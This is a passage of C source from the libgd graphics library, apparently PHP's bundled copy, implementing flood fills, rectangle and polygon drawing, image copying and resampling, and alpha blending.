leftLimit = i;
}
if (leftLimit == -1) {
im->alphaBlendingFlag = restoreAlphaBlending;
return;
}
/* Seek right */
rightLimit = x;
for (i = (x + 1); i < im->sx; i++) {
if (gdImageGetPixel(im, i, y) == border) {
break;
}
gdImageSetPixel(im, i, y, color);
rightLimit = i;
}
/* Look at lines above and below and start paints */
/* Above */
if (y > 0) {
lastBorder = 1;
for (i = leftLimit; i <= rightLimit; i++) {
int c = gdImageGetPixel(im, i, y - 1);
if (lastBorder) {
if ((c != border) && (c != color)) {
gdImageFillToBorder(im, i, y - 1, border, color);
lastBorder = 0;
}
} else if ((c == border) || (c == color)) {
lastBorder = 1;
}
}
}
/* Below */
if (y < ((im->sy) - 1)) {
lastBorder = 1;
for (i = leftLimit; i <= rightLimit; i++) {
int c = gdImageGetPixel(im, i, y + 1);
if (lastBorder) {
if ((c != border) && (c != color)) {
gdImageFillToBorder(im, i, y + 1, border, color);
lastBorder = 0;
}
} else if ((c == border) || (c == color)) {
lastBorder = 1;
}
}
}
im->alphaBlendingFlag = restoreAlphaBlending;
}
/*
* set the pixel at (x,y) and its 4-connected neighbors
* with the same pixel value to the new pixel value nc (new color).
* A 4-connected neighbor: pixel above, below, left, or right of a pixel.
* ideas from comp.graphics discussions.
 * For tiled fills a flag buffer is mandatory, because the tile image can
 * contain the same color as the fill color. To avoid bloating the normal
 * fill code, a second private function handles the tiled case.
*/
/* horizontal segment of scan line y */
struct seg {int y, xl, xr, dy;};
/* max depth of stack */
#define FILL_MAX ((int)(im->sy*im->sx)/4)
#define FILL_PUSH(Y, XL, XR, DY) \
if (sp<stack+FILL_MAX && Y+(DY)>=0 && Y+(DY)<wy2) \
{sp->y = Y; sp->xl = XL; sp->xr = XR; sp->dy = DY; sp++;}
#define FILL_POP(Y, XL, XR, DY) \
{sp--; Y = sp->y+(DY = sp->dy); XL = sp->xl; XR = sp->xr;}
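/* The fills below use the classic scan-line seed fill: each stack entry
 * records a parent span (y, xl..xr) and a direction dy (+1 or -1); popping
 * it yields the row y+dy to be scanned next. Runs are extended left and
 * right while the old color oc is seen, and any spans that leak past the
 * parent span are pushed back in the opposite direction.
 */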
static void _gdImageFillTiled(gdImagePtr im, int x, int y, int nc);
void gdImageFill(gdImagePtr im, int x, int y, int nc)
{
int l, x1, x2, dy;
int oc; /* old pixel value */
int wx2,wy2;
int alphablending_bak;
/* stack of filled segments */
/* struct seg stack[FILL_MAX],*sp = stack;; */
struct seg *stack = NULL;
struct seg *sp;
if (!im->trueColor && nc > (im->colorsTotal -1)) {
return;
}
alphablending_bak = im->alphaBlendingFlag;
im->alphaBlendingFlag = 0;
if (nc==gdTiled){
_gdImageFillTiled(im,x,y,nc);
im->alphaBlendingFlag = alphablending_bak;
return;
}
wx2=im->sx;wy2=im->sy;
oc = gdImageGetPixel(im, x, y);
if (oc==nc || x<0 || x>wx2 || y<0 || y>wy2) {
im->alphaBlendingFlag = alphablending_bak;
return;
}
/* Do not use the 4 neighbors implementation with
* small images
*/
if (im->sx < 4) {
int ix = x, iy = y, c;
do {
do {
c = gdImageGetPixel(im, ix, iy);
if (c != oc) {
goto done;
}
gdImageSetPixel(im, ix, iy, nc);
} while(ix++ < (im->sx -1));
ix = x;
} while(iy++ < (im->sy -1));
goto done;
}
stack = (struct seg *)safe_emalloc(sizeof(struct seg), ((int)(im->sy*im->sx)/4), 1);
sp = stack;
/* required! */
FILL_PUSH(y,x,x,1);
/* seed segment (popped 1st) */
FILL_PUSH(y+1, x, x, -1);
while (sp>stack) {
FILL_POP(y, x1, x2, dy);
for (x=x1; x>=0 && gdImageGetPixel(im,x, y)==oc; x--) {
gdImageSetPixel(im,x, y, nc);
}
if (x>=x1) {
goto skip;
}
l = x+1;
/* leak on left? */
if (l<x1) {
FILL_PUSH(y, l, x1-1, -dy);
}
x = x1+1;
do {
for (; x<=wx2 && gdImageGetPixel(im,x, y)==oc; x++) {
gdImageSetPixel(im, x, y, nc);
}
FILL_PUSH(y, l, x-1, dy);
/* leak on right? */
if (x>x2+1) {
FILL_PUSH(y, x2+1, x-1, -dy);
}
skip: for (x++; x<=x2 && (gdImageGetPixel(im, x, y)!=oc); x++);
l = x;
} while (x<=x2);
}
efree(stack);
done:
im->alphaBlendingFlag = alphablending_bak;
}
static void _gdImageFillTiled(gdImagePtr im, int x, int y, int nc)
{
int i, l, x1, x2, dy;
int oc; /* old pixel value */
int wx2,wy2;
/* stack of filled segments */
struct seg *stack;
struct seg *sp;
char **pts;
if (!im->tile) {
return;
}
wx2=im->sx;wy2=im->sy;
nc = gdImageTileGet(im,x,y);
pts = (char **) ecalloc(im->sy + 1, sizeof(char *));
for (i = 0; i < im->sy + 1; i++) {
pts[i] = (char *) ecalloc(im->sx + 1, sizeof(char));
}
stack = (struct seg *)safe_emalloc(sizeof(struct seg), ((int)(im->sy*im->sx)/4), 1);
sp = stack;
oc = gdImageGetPixel(im, x, y);
/* required! */
FILL_PUSH(y,x,x,1);
/* seed segment (popped 1st) */
FILL_PUSH(y+1, x, x, -1);
while (sp>stack) {
FILL_POP(y, x1, x2, dy);
for (x=x1; x>=0 && (!pts[y][x] && gdImageGetPixel(im,x,y)==oc); x--) {
nc = gdImageTileGet(im,x,y);
pts[y][x] = 1;
gdImageSetPixel(im,x, y, nc);
}
if (x>=x1) {
goto skip;
}
l = x+1;
/* leak on left? */
if (l<x1) {
FILL_PUSH(y, l, x1-1, -dy);
}
x = x1+1;
do {
for(; x<wx2 && (!pts[y][x] && gdImageGetPixel(im,x, y)==oc); x++) {
nc = gdImageTileGet(im,x,y);
pts[y][x] = 1;
gdImageSetPixel(im, x, y, nc);
}
FILL_PUSH(y, l, x-1, dy);
/* leak on right? */
if (x>x2+1) {
FILL_PUSH(y, x2+1, x-1, -dy);
}
skip: for(x++; x<=x2 && (pts[y][x] || gdImageGetPixel(im,x, y)!=oc); x++);
l = x;
} while (x<=x2);
}
for(i = 0; i < im->sy + 1; i++) {
efree(pts[i]);
}
efree(pts);
efree(stack);
}
void gdImageRectangle (gdImagePtr im, int x1, int y1, int x2, int y2, int color)
{
int x1h = x1, x1v = x1, y1h = y1, y1v = y1, x2h = x2, x2v = x2, y2h = y2, y2v = y2;
int thick = im->thick;
int t;
if (x1 == x2 && y1 == y2 && thick == 1) {
gdImageSetPixel(im, x1, y1, color);
return;
}
if (y2 < y1) {
t=y1;
y1 = y2;
y2 = t;
t = x1;
x1 = x2;
x2 = t;
}
x1h = x1; x1v = x1; y1h = y1; y1v = y1; x2h = x2; x2v = x2; y2h = y2; y2v = y2;
if (thick > 1) {
int cx, cy, x1ul, y1ul, x2lr, y2lr;
int half = thick >> 1;
x1ul = x1 - half;
y1ul = y1 - half;
x2lr = x2 + half;
y2lr = y2 + half;
cy = y1ul + thick;
while (cy-- > y1ul) {
cx = x1ul - 1;
while (cx++ < x2lr) {
gdImageSetPixel(im, cx, cy, color);
}
}
cy = y2lr - thick;
while (cy++ < y2lr) {
cx = x1ul - 1;
while (cx++ < x2lr) {
gdImageSetPixel(im, cx, cy, color);
}
}
cy = y1ul + thick - 1;
while (cy++ < y2lr -thick) {
cx = x1ul - 1;
while (cx++ < x1ul + thick) {
gdImageSetPixel(im, cx, cy, color);
}
}
cy = y1ul + thick - 1;
while (cy++ < y2lr -thick) {
cx = x2lr - thick - 1;
while (cx++ < x2lr) {
gdImageSetPixel(im, cx, cy, color);
}
}
return;
} else {
y1v = y1h + 1;
y2v = y2h - 1;
gdImageLine(im, x1h, y1h, x2h, y1h, color);
gdImageLine(im, x1h, y2h, x2h, y2h, color);
gdImageLine(im, x1v, y1v, x1v, y2v, color);
gdImageLine(im, x2v, y1v, x2v, y2v, color);
}
}
void gdImageFilledRectangle (gdImagePtr im, int x1, int y1, int x2, int y2, int color)
{
int x, y;
if (x1 == x2 && y1 == y2) {
gdImageSetPixel(im, x1, y1, color);
return;
}
if (x1 > x2) {
x = x1;
x1 = x2;
x2 = x;
}
if (y1 > y2) {
y = y1;
y1 = y2;
y2 = y;
}
if (x1 < 0) {
x1 = 0;
}
if (x2 >= gdImageSX(im)) {
x2 = gdImageSX(im) - 1;
}
if (y1 < 0) {
y1 = 0;
}
if (y2 >= gdImageSY(im)) {
y2 = gdImageSY(im) - 1;
}
for (y = y1; (y <= y2); y++) {
for (x = x1; (x <= x2); x++) {
gdImageSetPixel (im, x, y, color);
}
}
}
void gdImageCopy (gdImagePtr dst, gdImagePtr src, int dstX, int dstY, int srcX, int srcY, int w, int h)
{
int c;
int x, y;
int tox, toy;
int i;
int colorMap[gdMaxColors];
if (dst->trueColor) {
/* 2.0: much easier when the destination is truecolor. */
/* 2.0.10: needs a transparent-index check that is still valid if
* the source is not truecolor. Thanks to Frank Warmerdam.
*/
if (src->trueColor) {
for (y = 0; (y < h); y++) {
for (x = 0; (x < w); x++) {
int c = gdImageGetTrueColorPixel (src, srcX + x, srcY + y);
gdImageSetPixel (dst, dstX + x, dstY + y, c);
}
}
} else {
/* source is palette based */
for (y = 0; (y < h); y++) {
for (x = 0; (x < w); x++) {
int c = gdImageGetPixel (src, srcX + x, srcY + y);
if (c != src->transparent) {
gdImageSetPixel(dst, dstX + x, dstY + y, gdTrueColorAlpha(src->red[c], src->green[c], src->blue[c], src->alpha[c]));
}
}
}
}
return;
}
/* Destination is palette based */
if (src->trueColor) { /* But source is truecolor (Ouch!) */
toy = dstY;
for (y = srcY; (y < (srcY + h)); y++) {
tox = dstX;
for (x = srcX; x < (srcX + w); x++) {
int nc;
c = gdImageGetPixel (src, x, y);
/* Get best match possible. */
nc = gdImageColorResolveAlpha(dst, gdTrueColorGetRed(c), gdTrueColorGetGreen(c), gdTrueColorGetBlue(c), gdTrueColorGetAlpha(c));
gdImageSetPixel(dst, tox, toy, nc);
tox++;
}
toy++;
}
return;
}
/* Palette based to palette based */
for (i = 0; i < gdMaxColors; i++) {
colorMap[i] = (-1);
}
toy = dstY;
for (y = srcY; y < (srcY + h); y++) {
tox = dstX;
for (x = srcX; x < (srcX + w); x++) {
int nc;
int mapTo;
c = gdImageGetPixel (src, x, y);
/* Added 7/24/95: support transparent copies */
if (gdImageGetTransparent (src) == c) {
tox++;
continue;
}
/* Have we established a mapping for this color? */
if (src->trueColor) {
/* 2.05: remap to the palette available in the destination image. This is slow and
* works badly, but it beats crashing! Thanks to Padhrig McCarthy.
*/
mapTo = gdImageColorResolveAlpha (dst, gdTrueColorGetRed (c), gdTrueColorGetGreen (c), gdTrueColorGetBlue (c), gdTrueColorGetAlpha (c));
} else if (colorMap[c] == (-1)) {
/* If it's the same image, mapping is trivial */
if (dst == src) {
nc = c;
} else {
/* Get best match possible. This function never returns error. */
nc = gdImageColorResolveAlpha (dst, src->red[c], src->green[c], src->blue[c], src->alpha[c]);
}
colorMap[c] = nc;
mapTo = colorMap[c];
} else {
mapTo = colorMap[c];
}
gdImageSetPixel (dst, tox, toy, mapTo);
tox++;
}
toy++;
}
}
/* This function is a substitute for real alpha channel operations,
so it doesn't pay attention to the alpha channel. */
void gdImageCopyMerge (gdImagePtr dst, gdImagePtr src, int dstX, int dstY, int srcX, int srcY, int w, int h, int pct)
{
int c, dc;
int x, y;
int tox, toy;
int ncR, ncG, ncB;
toy = dstY;
for (y = srcY; y < (srcY + h); y++) {
tox = dstX;
for (x = srcX; x < (srcX + w); x++) {
int nc;
c = gdImageGetPixel(src, x, y);
/* Added 7/24/95: support transparent copies */
if (gdImageGetTransparent(src) == c) {
tox++;
continue;
}
/* If it's the same image, mapping is trivial */
if (dst == src) {
nc = c;
} else {
dc = gdImageGetPixel(dst, tox, toy);
ncR = (int)(gdImageRed (src, c) * (pct / 100.0) + gdImageRed (dst, dc) * ((100 - pct) / 100.0));
ncG = (int)(gdImageGreen (src, c) * (pct / 100.0) + gdImageGreen (dst, dc) * ((100 - pct) / 100.0));
ncB = (int)(gdImageBlue (src, c) * (pct / 100.0) + gdImageBlue (dst, dc) * ((100 - pct) / 100.0));
/* Find a reasonable color */
nc = gdImageColorResolve (dst, ncR, ncG, ncB);
}
gdImageSetPixel (dst, tox, toy, nc);
tox++;
}
toy++;
}
}
/* This function is a substitute for real alpha channel operations,
so it doesn't pay attention to the alpha channel. */
void gdImageCopyMergeGray (gdImagePtr dst, gdImagePtr src, int dstX, int dstY, int srcX, int srcY, int w, int h, int pct)
{
int c, dc;
int x, y;
int tox, toy;
int ncR, ncG, ncB;
float g;
toy = dstY;
for (y = srcY; (y < (srcY + h)); y++) {
tox = dstX;
for (x = srcX; (x < (srcX + w)); x++) {
int nc;
c = gdImageGetPixel (src, x, y);
/* Added 7/24/95: support transparent copies */
if (gdImageGetTransparent(src) == c) {
tox++;
continue;
}
/*
* If it's the same image, mapping is NOT trivial since we
* merge with greyscale target, but if pct is 100, the grey
* value is not used, so it becomes trivial. pjw 2.0.12.
*/
if (dst == src && pct == 100) {
nc = c;
} else {
dc = gdImageGetPixel(dst, tox, toy);
g = (0.29900f * gdImageRed(dst, dc)) + (0.58700f * gdImageGreen(dst, dc)) + (0.11400f * gdImageBlue(dst, dc));
ncR = (int)(gdImageRed (src, c) * (pct / 100.0f) + g * ((100 - pct) / 100.0));
ncG = (int)(gdImageGreen (src, c) * (pct / 100.0f) + g * ((100 - pct) / 100.0));
ncB = (int)(gdImageBlue (src, c) * (pct / 100.0f) + g * ((100 - pct) / 100.0));
/* First look for an exact match */
nc = gdImageColorExact(dst, ncR, ncG, ncB);
if (nc == (-1)) {
/* No, so try to allocate it */
nc = gdImageColorAllocate(dst, ncR, ncG, ncB);
/* If we're out of colors, go for the closest color */
if (nc == (-1)) {
nc = gdImageColorClosest(dst, ncR, ncG, ncB);
}
}
}
gdImageSetPixel(dst, tox, toy, nc);
tox++;
}
toy++;
}
}
void gdImageCopyResized (gdImagePtr dst, gdImagePtr src, int dstX, int dstY, int srcX, int srcY, int dstW, int dstH, int srcW, int srcH)
{
int c;
int x, y;
int tox, toy;
int ydest;
int i;
int colorMap[gdMaxColors];
/* Stretch vectors */
int *stx, *sty;
if (overflow2(sizeof(int), srcW)) {
return;
}
if (overflow2(sizeof(int), srcH)) {
return;
}
stx = (int *) gdMalloc (sizeof (int) * srcW);
sty = (int *) gdMalloc (sizeof (int) * srcH);
/* Fixed by Mao Morimoto 2.0.16 */
for (i = 0; (i < srcW); i++) {
stx[i] = dstW * (i+1) / srcW - dstW * i / srcW ;
}
for (i = 0; (i < srcH); i++) {
sty[i] = dstH * (i+1) / srcH - dstH * i / srcH ;
}
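/* stx[i] / sty[i] hold how many destination pixels the i-th source column /
 * row expands (or shrinks) to, computed so that the run lengths always sum
 * to dstW / dstH. For example, srcW = 3 and dstW = 5 gives stx = {1, 2, 2}.
 */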
for (i = 0; (i < gdMaxColors); i++) {
colorMap[i] = (-1);
}
toy = dstY;
for (y = srcY; (y < (srcY + srcH)); y++) {
for (ydest = 0; (ydest < sty[y - srcY]); ydest++) {
tox = dstX;
for (x = srcX; (x < (srcX + srcW)); x++) {
int nc = 0;
int mapTo;
if (!stx[x - srcX]) {
continue;
}
if (dst->trueColor) {
/* 2.0.9: Thorben Kundinger: Maybe the source image is not a truecolor image */
if (!src->trueColor) {
int tmp = gdImageGetPixel (src, x, y);
mapTo = gdImageGetTrueColorPixel (src, x, y);
if (gdImageGetTransparent (src) == tmp) {
/* 2.0.21, TK: not tox++ */
tox += stx[x - srcX];
continue;
}
} else {
/* TK: old code follows */
mapTo = gdImageGetTrueColorPixel (src, x, y);
/* Added 7/24/95: support transparent copies */
if (gdImageGetTransparent (src) == mapTo) {
/* 2.0.21, TK: not tox++ */
tox += stx[x - srcX];
continue;
}
}
} else {
c = gdImageGetPixel (src, x, y);
/* Added 7/24/95: support transparent copies */
if (gdImageGetTransparent (src) == c) {
tox += stx[x - srcX];
continue;
}
if (src->trueColor) {
/* Remap to the palette available in the destination image. This is slow and works badly. */
mapTo = gdImageColorResolveAlpha(dst, gdTrueColorGetRed(c),
gdTrueColorGetGreen(c),
gdTrueColorGetBlue(c),
gdTrueColorGetAlpha (c));
} else {
/* Have we established a mapping for this color? */
if (colorMap[c] == (-1)) {
/* If it's the same image, mapping is trivial */
if (dst == src) {
nc = c;
} else {
/* Find or create the best match */
/* 2.0.5: can't use gdTrueColorGetRed, etc with palette */
nc = gdImageColorResolveAlpha(dst, gdImageRed(src, c),
gdImageGreen(src, c),
gdImageBlue(src, c),
gdImageAlpha(src, c));
}
colorMap[c] = nc;
}
mapTo = colorMap[c];
}
}
for (i = 0; (i < stx[x - srcX]); i++) {
gdImageSetPixel (dst, tox, toy, mapTo);
tox++;
}
}
toy++;
}
}
gdFree (stx);
gdFree (sty);
}
/* When gd 1.x was first created, floating point was to be avoided.
These days it is often faster than table lookups or integer
arithmetic. The routine below is shamelessly, gloriously
floating point. TBB */
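/* Each destination pixel below averages the (fractional) source rectangle
 * [sx1, sx2) x [sy1, sy2) that maps onto it. Colour channels are weighted
 * by pixel coverage times opacity (gdAlphaMax - alpha), and the alpha
 * channel by coverage alone, so nearly transparent source pixels do not
 * wash out the colour of the result.
 */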
void gdImageCopyResampled (gdImagePtr dst, gdImagePtr src, int dstX, int dstY, int srcX, int srcY, int dstW, int dstH, int srcW, int srcH)
{
int x, y;
double sy1, sy2, sx1, sx2;
if (!dst->trueColor) {
gdImageCopyResized (dst, src, dstX, dstY, srcX, srcY, dstW, dstH, srcW, srcH);
return;
}
for (y = dstY; (y < dstY + dstH); y++) {
sy1 = ((double) y - (double) dstY) * (double) srcH / (double) dstH;
sy2 = ((double) (y + 1) - (double) dstY) * (double) srcH / (double) dstH;
for (x = dstX; (x < dstX + dstW); x++) {
double sx, sy;
double spixels = 0;
double red = 0.0, green = 0.0, blue = 0.0, alpha = 0.0;
double alpha_factor, alpha_sum = 0.0, contrib_sum = 0.0;
sx1 = ((double) x - (double) dstX) * (double) srcW / dstW;
sx2 = ((double) (x + 1) - (double) dstX) * (double) srcW / dstW;
sy = sy1;
do {
double yportion;
if (floor_cast(sy) == floor_cast(sy1)) {
yportion = 1.0f - (sy - floor_cast(sy));
if (yportion > sy2 - sy1) {
yportion = sy2 - sy1;
}
sy = floor_cast(sy);
} else if (sy == floorf(sy2)) {
yportion = sy2 - floor_cast(sy2);
} else {
yportion = 1.0f;
}
sx = sx1;
do {
double xportion;
double pcontribution;
int p;
if (floorf(sx) == floor_cast(sx1)) {
xportion = 1.0f - (sx - floor_cast(sx));
if (xportion > sx2 - sx1) {
xportion = sx2 - sx1;
}
sx = floor_cast(sx);
} else if (sx == floorf(sx2)) {
xportion = sx2 - floor_cast(sx2);
} else {
xportion = 1.0f;
}
pcontribution = xportion * yportion;
p = gdImageGetTrueColorPixel(src, (int) sx + srcX, (int) sy + srcY);
alpha_factor = ((gdAlphaMax - gdTrueColorGetAlpha(p))) * pcontribution;
red += gdTrueColorGetRed (p) * alpha_factor;
green += gdTrueColorGetGreen (p) * alpha_factor;
blue += gdTrueColorGetBlue (p) * alpha_factor;
alpha += gdTrueColorGetAlpha (p) * pcontribution;
alpha_sum += alpha_factor;
contrib_sum += pcontribution;
spixels += xportion * yportion;
sx += 1.0f;
}
while (sx < sx2);
sy += 1.0f;
}
while (sy < sy2);
if (spixels != 0.0f) {
red /= spixels;
green /= spixels;
blue /= spixels;
alpha /= spixels;
alpha += 0.5;
}
if ( alpha_sum != 0.0f) {
if( contrib_sum != 0.0f) {
alpha_sum /= contrib_sum;
}
red /= alpha_sum;
green /= alpha_sum;
blue /= alpha_sum;
}
/* Clamping to allow for rounding errors above */
if (red > 255.0f) {
red = 255.0f;
}
if (green > 255.0f) {
green = 255.0f;
}
if (blue > 255.0f) {
blue = 255.0f;
}
if (alpha > gdAlphaMax) {
alpha = gdAlphaMax;
}
gdImageSetPixel(dst, x, y, gdTrueColorAlpha ((int) red, (int) green, (int) blue, (int) alpha));
}
}
}
void gdImagePolygon (gdImagePtr im, gdPointPtr p, int n, int c)
{
int i;
int lx, ly;
typedef void (*image_line)(gdImagePtr im, int x1, int y1, int x2, int y2, int color);
image_line draw_line;
if (n <= 0) {
return;
}
/* Let it be known that we are drawing a polygon so that the opacity
* mask doesn't get cleared after each line.
*/
if (c == gdAntiAliased) {
im->AA_polygon = 1;
}
if ( im->antialias) {
draw_line = gdImageAALine;
} else {
draw_line = gdImageLine;
}
lx = p->x;
ly = p->y;
draw_line(im, lx, ly, p[n - 1].x, p[n - 1].y, c);
for (i = 1; i < n; i++) {
p++;
draw_line(im, lx, ly, p->x, p->y, c);
lx = p->x;
ly = p->y;
}
if (c == gdAntiAliased) {
im->AA_polygon = 0;
gdImageAABlend(im);
}
}
int gdCompareInt (const void *a, const void *b);
/* THANKS to Kirsten Schulz for the polygon fixes! */
/* The intersection finding technique of this code could be improved
 * by remembering the previous intersection, and by using the slope.
* That could help to adjust intersections to produce a nice
* interior_extrema.
*/
void gdImageFilledPolygon (gdImagePtr im, gdPointPtr p, int n, int c)
{
int i;
int y;
int miny, maxy, pmaxy;
int x1, y1;
int x2, y2;
int ind1, ind2;
int ints;
int fill_color;
if (n <= 0) {
return;
}
if (overflow2(sizeof(int), n)) {
return;
}
if (c == gdAntiAliased) {
fill_color = im->AA_color;
} else {
fill_color = c;
}
if (!im->polyAllocated) {
im->polyInts = (int *) gdMalloc(sizeof(int) * n);
im->polyAllocated = n;
}
if (im->polyAllocated < n) {
while (im->polyAllocated < n) {
im->polyAllocated *= 2;
}
if (overflow2(sizeof(int), im->polyAllocated)) {
return;
}
im->polyInts = (int *) gdRealloc(im->polyInts, sizeof(int) * im->polyAllocated);
}
miny = p[0].y;
maxy = p[0].y;
for (i = 1; i < n; i++) {
if (p[i].y < miny) {
miny = p[i].y;
}
if (p[i].y > maxy) {
maxy = p[i].y;
}
}
pmaxy = maxy;
/* 2.0.16: Optimization by Ilia Chipitsine -- don't waste time offscreen */
if (miny < 0) {
miny = 0;
}
if (maxy >= gdImageSY(im)) {
maxy = gdImageSY(im) - 1;
}
/* Fix in 1.3: count a vertex only once */
for (y = miny; y <= maxy; y++) {
/*1.4 int interLast = 0; */
/* int dirLast = 0; */
/* int interFirst = 1; */
ints = 0;
for (i = 0; i < n; i++) {
if (!i) {
ind1 = n - 1;
ind2 = 0;
} else {
ind1 = i - 1;
ind2 = i;
}
y1 = p[ind1].y;
y2 = p[ind2].y;
if (y1 < y2) {
x1 = p[ind1].x;
x2 = p[ind2].x;
} else if (y1 > y2) {
y2 = p[ind1].y;
y1 = p[ind2].y;
x2 = p[ind1].x;
x1 = p[ind2].x;
} else {
continue;
}
/* Do the following math in floating point as an intermediate step and
 * round the result, so that Polygon and FilledPolygon produce the same
 * footprint for the same set of points.
*/
if (y >= y1 && y < y2) {
im->polyInts[ints++] = (float) ((y - y1) * (x2 - x1)) / (float) (y2 - y1) + 0.5 + x1;
} else if (y == pmaxy && y == y2) {
im->polyInts[ints++] = x2;
}
}
qsort(im->polyInts, ints, sizeof(int), gdCompareInt);
for (i = 0; i < ints - 1; i += 2) {
gdImageLine(im, im->polyInts[i], y, im->polyInts[i + 1], y, fill_color);
}
}
/* If we are drawing this AA, then redraw the border with AA lines. */
if (c == gdAntiAliased) {
gdImagePolygon(im, p, n, c);
}
}
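/* Illustrative call (not compiled): fill a triangle using the even-odd
 * scan-line rule implemented above, assuming im is an existing image and
 * col a previously allocated color.
 */
#if 0
{
gdPoint tri[3];
tri[0].x = 10; tri[0].y = 10;
tri[1].x = 50; tri[1].y = 20;
tri[2].x = 30; tri[2].y = 60;
gdImageFilledPolygon(im, tri, 3, col);
}
#endif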
int gdCompareInt (const void *a, const void *b)
{
return (*(const int *) a) - (*(const int *) b);
}
void gdImageSetStyle (gdImagePtr im, int *style, int noOfPixels)
{
if (im->style) {
gdFree(im->style);
}
im->style = (int *) gdMalloc(sizeof(int) * noOfPixels);
memcpy(im->style, style, sizeof(int) * noOfPixels);
im->styleLength = noOfPixels;
im->stylePos = 0;
}
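/* Illustrative call (not compiled): a simple dash pattern. Style entries
 * are ordinary color values or gdTransparent; gdImageSetPixel consumes one
 * entry per plotted pixel when the drawing color is gdStyled (see above).
 * Assumes im is an existing image and fg an allocated color.
 */
#if 0
{
int style[8];
int i;
for (i = 0; i < 4; i++) {
style[i] = fg;
}
for (i = 4; i < 8; i++) {
style[i] = gdTransparent;
}
gdImageSetStyle(im, style, 8);
gdImageLine(im, 0, 0, 100, 0, gdStyled);
}
#endif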
void gdImageSetThickness (gdImagePtr im, int thickness)
{
im->thick = thickness;
}
void gdImageSetBrush (gdImagePtr im, gdImagePtr brush)
{
int i;
im->brush = brush;
if (!im->trueColor && !im->brush->trueColor) {
for (i = 0; i < gdImageColorsTotal(brush); i++) {
int index;
index = gdImageColorResolveAlpha(im, gdImageRed(brush, i), gdImageGreen(brush, i), gdImageBlue(brush, i), gdImageAlpha(brush, i));
im->brushColorMap[i] = index;
}
}
}
void gdImageSetTile (gdImagePtr im, gdImagePtr tile)
{
int i;
im->tile = tile;
if (!im->trueColor && !im->tile->trueColor) {
for (i = 0; i < gdImageColorsTotal(tile); i++) {
int index;
index = gdImageColorResolveAlpha(im, gdImageRed(tile, i), gdImageGreen(tile, i), gdImageBlue(tile, i), gdImageAlpha(tile, i));
im->tileColorMap[i] = index;
}
}
}
void gdImageSetAntiAliased (gdImagePtr im, int c)
{
im->AA = 1;
im->AA_color = c;
im->AA_dont_blend = -1;
}
void gdImageSetAntiAliasedDontBlend (gdImagePtr im, int c, int dont_blend)
{
im->AA = 1;
im->AA_color = c;
im->AA_dont_blend = dont_blend;
}
void gdImageInterlace (gdImagePtr im, int interlaceArg)
{
im->interlace = interlaceArg;
}
int gdImageCompare (gdImagePtr im1, gdImagePtr im2)
{
int x, y;
int p1, p2;
int cmpStatus = 0;
int sx, sy;
if (im1->interlace != im2->interlace) {
cmpStatus |= GD_CMP_INTERLACE;
}
if (im1->transparent != im2->transparent) {
cmpStatus |= GD_CMP_TRANSPARENT;
}
if (im1->trueColor != im2->trueColor) {
cmpStatus |= GD_CMP_TRUECOLOR;
}
sx = im1->sx;
if (im1->sx != im2->sx) {
cmpStatus |= GD_CMP_SIZE_X + GD_CMP_IMAGE;
if (im2->sx < im1->sx) {
sx = im2->sx;
}
}
sy = im1->sy;
if (im1->sy != im2->sy) {
cmpStatus |= GD_CMP_SIZE_Y + GD_CMP_IMAGE;
if (im2->sy < im1->sy) {
sy = im2->sy;
}
}
if (im1->colorsTotal != im2->colorsTotal) {
cmpStatus |= GD_CMP_NUM_COLORS;
}
for (y = 0; y < sy; y++) {
for (x = 0; x < sx; x++) {
p1 = im1->trueColor ? gdImageTrueColorPixel(im1, x, y) : gdImagePalettePixel(im1, x, y);
p2 = im2->trueColor ? gdImageTrueColorPixel(im2, x, y) : gdImagePalettePixel(im2, x, y);
if (gdImageRed(im1, p1) != gdImageRed(im2, p2)) {
cmpStatus |= GD_CMP_COLOR + GD_CMP_IMAGE;
break;
}
if (gdImageGreen(im1, p1) != gdImageGreen(im2, p2)) {
cmpStatus |= GD_CMP_COLOR + GD_CMP_IMAGE;
break;
}
if (gdImageBlue(im1, p1) != gdImageBlue(im2, p2)) {
cmpStatus |= GD_CMP_COLOR + GD_CMP_IMAGE;
break;
}
#if 0
/* Soon we'll add alpha channel to palettes */
if (gdImageAlpha(im1, p1) != gdImageAlpha(im2, p2)) {
cmpStatus |= GD_CMP_COLOR + GD_CMP_IMAGE;
break;
}
#endif
}
if (cmpStatus & GD_CMP_COLOR) {
break;
}
}
return cmpStatus;
}
int gdAlphaBlendOld (int dst, int src)
{
/* 2.0.12: TBB: alpha in the destination should be a
* component of the result. Thanks to Frank Warmerdam for
* pointing out the issue.
*/
return ((((gdTrueColorGetAlpha (src) *
gdTrueColorGetAlpha (dst)) / gdAlphaMax) << 24) +
((((gdAlphaTransparent - gdTrueColorGetAlpha (src)) *
gdTrueColorGetRed (src) / gdAlphaMax) +
(gdTrueColorGetAlpha (src) *
gdTrueColorGetRed (dst)) / gdAlphaMax) << 16) +
((((gdAlphaTransparent - gdTrueColorGetAlpha (src)) *
gdTrueColorGetGreen (src) / gdAlphaMax) +
(gdTrueColorGetAlpha (src) *
gdTrueColorGetGreen (dst)) / gdAlphaMax) << 8) +
(((gdAlphaTransparent - gdTrueColorGetAlpha (src)) *
gdTrueColorGetBlue (src) / gdAlphaMax) +
(gdTrueColorGetAlpha (src) *
gdTrueColorGetBlue (dst)) / gdAlphaMax));
}
int gdAlphaBlend (int dst, int src) {
int src_alpha = gdTrueColorGetAlpha(src);
int dst_alpha, alpha, red, green, blue;
int src_weight, dst_weight, tot_weight;
/* -------------------------------------------------------------------- */
/* Simple cases we want to handle fast. */
/* -------------------------------------------------------------------- */
if( src_alpha == gdAlphaOpaque )
return src;
dst_alpha = gdTrueColorGetAlpha(dst);
if( src_alpha == gdAlphaTransparent )
return dst;
if( dst_alpha == gdAlphaTransparent )
return src;
/* -------------------------------------------------------------------- */
/* What will the source and destination alphas be? Note that */
/* the destination weighting is substantially reduced as the */
/* overlay becomes quite opaque. */
/* -------------------------------------------------------------------- */
src_weight = gdAlphaTransparent - src_alpha;
dst_weight = (gdAlphaTransparent - dst_alpha) * src_alpha / gdAlphaMax;
tot_weight = src_weight + dst_weight;
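/* Illustrative example (libgd uses gdAlphaMax == 127): with src_alpha == 32 and
* dst_alpha == 64, src_weight == 95, dst_weight == (127 - 64) * 32 / 127 == 15 and
* tot_weight == 110, so the blend leans heavily toward the more opaque source pixel. */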
/* -------------------------------------------------------------------- */
/* What red, green and blue result values will we use? */
/* -------------------------------------------------------------------- */
alpha = src_alpha * dst_alpha / gdAlphaMax;
red = (gdTrueColorGetRed(src) * src_weight
+ gdTrueColorGetRed(dst) * dst_weight) / tot_weight;
green = (gdTrueColorGetGreen(src) * src_weight
